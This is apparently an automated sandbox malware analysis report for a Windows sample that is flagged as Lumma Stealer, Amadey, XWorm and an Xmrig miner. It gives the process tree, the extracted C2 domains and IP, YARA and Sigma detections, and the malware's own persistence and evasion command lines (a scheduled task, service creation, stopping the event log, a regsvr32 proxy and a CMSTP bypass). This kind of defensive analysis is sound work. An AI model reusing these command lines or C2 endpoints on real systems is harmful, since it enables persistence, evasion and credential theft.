Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1585651
MD5: 38560b590890a37ab8460092560d282c
SHA1: 2564dac98b8ed26fccaed9764f172c9123e50f2b
SHA256: 014857e05f8c8abace4ccf74a6e613a755a651d724c510dc5959bea75295f53b
Tags: exe, user-Bitsight

Detection

LummaC, Amadey, LummaC Stealer, XWorm, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Powershell launch regsvr32
Sigma detected: Stop EventLog
Yara detected Amadey
Yara detected Amadey's stealer DLL
Yara detected LummaC Stealer
Yara detected UAC Bypass using CMSTP
Yara detected XWorm
Yara detected Xmrig cryptocurrency miner
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the startup folder
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found pyInstaller with non standard icon
Found strings related to Crypto-Mining
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Sigma detected: Suspect Svchost Activity
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 7756 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 38560B590890A37AB8460092560D282C)
    • skotes.exe (PID: 7920 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 38560B590890A37AB8460092560D282C)
  • skotes.exe (PID: 7432 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 38560B590890A37AB8460092560D282C)
    • 9LbUK15.exe (PID: 7776 cmdline: "C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe" MD5: 86268AF17C4C5AFF970734EB5775A7F8)
      • cmstp.exe (PID: 7856 cmdline: "c:\windows\system32\cmstp.exe" /au C:\Users\user\Sys.inf MD5: D7AABFAB5BEFD53BA3A27BD48F3CC675)
      • Ele.exe (PID: 8032 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe" MD5: 75C2C9D60104BA3C4271B2A629E90023)
    • e44fda3216.exe (PID: 1608 cmdline: "C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe" MD5: 89CF32E94C9A6312D70F99607678E53F)
    • zjFtdxQ.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" MD5: 68D36FA633B4FB19D5C5B285C9A0B415)
      • zjFtdxQ.tmp (PID: 7424 cmdline: "C:\Users\user\AppData\Local\Temp\is-55I8I.tmp\zjFtdxQ.tmp" /SL5="$30528,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" MD5: BCC236A3921E1388596A42B05686FF5E)
        • zjFtdxQ.exe (PID: 2044 cmdline: "C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT MD5: 68D36FA633B4FB19D5C5B285C9A0B415)
          • zjFtdxQ.tmp (PID: 2000 cmdline: "C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp" /SL5="$20532,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT MD5: BCC236A3921E1388596A42B05686FF5E)
            • regsvr32.exe (PID: 4088 cmdline: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv" MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
              • regsvr32.exe (PID: 6072 cmdline: /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv" MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)
                • powershell.exe (PID: 4904 cmdline: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • NzL6O1Q.exe (PID: 2112 cmdline: "C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe" MD5: D22612D2899FC888514C3CA553B49F79)
      • schtasks.exe (PID: 1668 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • db3cab6cee.exe (PID: 4600 cmdline: "C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe" MD5: 9D60674507EA97985C7E3B08D610F8D7)
  • svchost.exe (PID: 1196 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • Ele.exe (PID: 3408 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe" MD5: 75C2C9D60104BA3C4271B2A629E90023)
  • pcqxl.exe (PID: 5292 cmdline: C:\Users\user\AppData\Local\Temp\pcqxl.exe MD5: 382DC2CC6405B237FA73B03EF0B52327)
    • powercfg.exe (PID: 4484 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2164 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 8140 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1804 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5632 cmdline: C:\Windows\system32\sc.exe delete "RNRFMTFS" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3740 cmdline: C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2992 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4348 cmdline: C:\Windows\system32\sc.exe start "RNRFMTFS" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • NzL6O1Q.exe (PID: 8160 cmdline: C:\Users\user\AppData\Roaming\NzL6O1Q.exe MD5: D22612D2899FC888514C3CA553B49F79)
  • yklcfqtilcgt.exe (PID: 6172 cmdline: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe MD5: 382DC2CC6405B237FA73B03EF0B52327)
    • powercfg.exe (PID: 2140 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 5476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 2716 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4564 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6176 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 6192 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 6596 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • NzL6O1Q.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Roaming\NzL6O1Q.exe" MD5: D22612D2899FC888514C3CA553B49F79)
  • NzL6O1Q.exe (PID: 7768 cmdline: "C:\Users\user\AppData\Roaming\NzL6O1Q.exe" MD5: D22612D2899FC888514C3CA553B49F79)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: XWorm
Description: Malware with wide range of capabilities ranging from RAT to ransomware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

{"C2 url": ["crowdwarek.shop", "apporholis.shop", "letterdrive.shop", "handscreamny.shop", "chipdonkeruz.shop", "soundtappysk.shop", "robinsharez.shop", "femalsabler.shop", "versersleep.shop"], "Build id": "LOGS11--6969"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe | rat_win_xworm_v2 | Finds XWorm v2 samples based on characteristic strings | Sekoia.io
  • 0x7652:$str02: ngrok
  • 0x1979b:$str02: ngrok
  • 0x197f5:$str02: ngrok
  • 0x73b1:$str03: Mutexx
  • 0x1991d:$str04: FileManagerSplitFileManagerSplit
  • 0x197c1:$str05: InstallngC
  • 0x19385:$str06: downloadedfile
  • 0x1927d:$str11: txtttt
  • 0x1a179:$str12: \root\SecurityCenter2
  • 0x199a3:$str13: [USB]
  • 0x19989:$str14: [Drive]
  • 0x1990b:$str15: [Folder]
  • 0x1a1a5:$str19: Select * from AntivirusProduct
  • 0x18e91:$str21: RunBotKiller
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\NzL6O1Q[1].exe | rat_win_xworm_v2 | Finds XWorm v2 samples based on characteristic strings | Sekoia.io
  • 0x7652:$str02: ngrok
  • 0x1979b:$str02: ngrok
  • 0x197f5:$str02: ngrok
  • 0x73b1:$str03: Mutexx
  • 0x1991d:$str04: FileManagerSplitFileManagerSplit
  • 0x197c1:$str05: InstallngC
  • 0x19385:$str06: downloadedfile
  • 0x1927d:$str11: txtttt
  • 0x1a179:$str12: \root\SecurityCenter2
  • 0x199a3:$str13: [USB]
  • 0x19989:$str14: [Drive]
  • 0x1990b:$str15: [Folder]
  • 0x1a1a5:$str19: Select * from AntivirusProduct
  • 0x18e91:$str21: RunBotKiller
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NzL6O1Q.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
00000015.00000002.2849008746.0000000000DE0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000005.00000002.3295768977.0000000000401000.00000040.00000001.01000000.00000008.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000015.00000002.2873162954.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000000.00000002.1716556204.0000000000E51000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000014.00000000.2457478435.0000000000722000.00000002.00000001.01000000.0000001A.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security

Source | Rule | Description | Author | Strings
21.2.Ele.exe.1315ae50.2.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
20.0.NzL6O1Q.exe.720000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
20.0.NzL6O1Q.exe.720000.0.unpack | rat_win_xworm_v2 | Finds XWorm v2 samples based on characteristic strings | Sekoia.io
  • 0x7652:$str02: ngrok
  • 0x1979b:$str02: ngrok
  • 0x197f5:$str02: ngrok
  • 0x73b1:$str03: Mutexx
  • 0x1991d:$str04: FileManagerSplitFileManagerSplit
  • 0x197c1:$str05: InstallngC
  • 0x19385:$str06: downloadedfile
  • 0x1927d:$str11: txtttt
  • 0x1a179:$str12: \root\SecurityCenter2
  • 0x199a3:$str13: [USB]
  • 0x19989:$str14: [Drive]
  • 0x1990b:$str15: [Folder]
  • 0x1a1a5:$str19: Select * from AntivirusProduct
  • 0x18e91:$str21: RunBotKiller
21.2.Ele.exe.de0000.0.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
5.2.skotes.exe.400000.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

Change of critical system settings

                          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentImage: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentProcessId: 5292, ParentProcessName: pcqxl.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 4484, ProcessName: powercfg.exe

System Summary

                          Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6072, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 4904, ProcessName: powershell.exe
                          Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, ParentImage: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, ParentProcessId: 6172, ParentProcessName: yklcfqtilcgt.exe, ProcessCommandLine: svchost.exe, ProcessId: 6596, ProcessName: svchost.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\NzL6O1Q.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, ProcessId: 2112, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NzL6O1Q
                          Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe, ProcessId: 7776, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xpf0uuzm.ug5.ps1
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", CommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp" /SL5="$20532,1318164,161792,C:\Users\user\AppData\Local\Temp\1033956001\zjFtdxQ.exe" /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-PQPF4.tmp\zjFtdxQ.tmp, ParentProcessId: 2000, ParentProcessName: zjFtdxQ.tmp, ProcessCommandLine: "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", ProcessId: 4088, ProcessName: regsvr32.exe
                          Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe, ProcessId: 7776, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe, ParentProcessId: 2112, ParentProcessName: NzL6O1Q.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "NzL6O1Q" /tr "C:\Users\user\AppData\Roaming\NzL6O1Q.exe", ProcessId: 1668, ProcessName: schtasks.exe
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, ParentImage: C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe, ParentProcessId: 6172, ParentProcessName: yklcfqtilcgt.exe, ProcessCommandLine: svchost.exe, ProcessId: 6596, ProcessName: svchost.exe
                          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentImage: C:\Users\user\AppData\Local\Temp\pcqxl.exe, ParentProcessId: 5292, ParentProcessName: pcqxl.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "RNRFMTFS" binpath= "C:\ProgramData\vhsqbqlujrwy\yklcfqtilcgt.exe" start= "auto", ProcessId: 3740, ProcessName: sc.exe
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: /s /i:SYNC "C:\Users\user\AppData\Roaming\\9rpcss_1.drv", ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 6072, ParentProcessName: regsvr32.exe, ProcessCommandLine: "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\9rpcss_1.drv' }) { exit 0 } else { exit 1 }", ProcessId: 4904, ProcessName: powershell.exe
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 1196, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

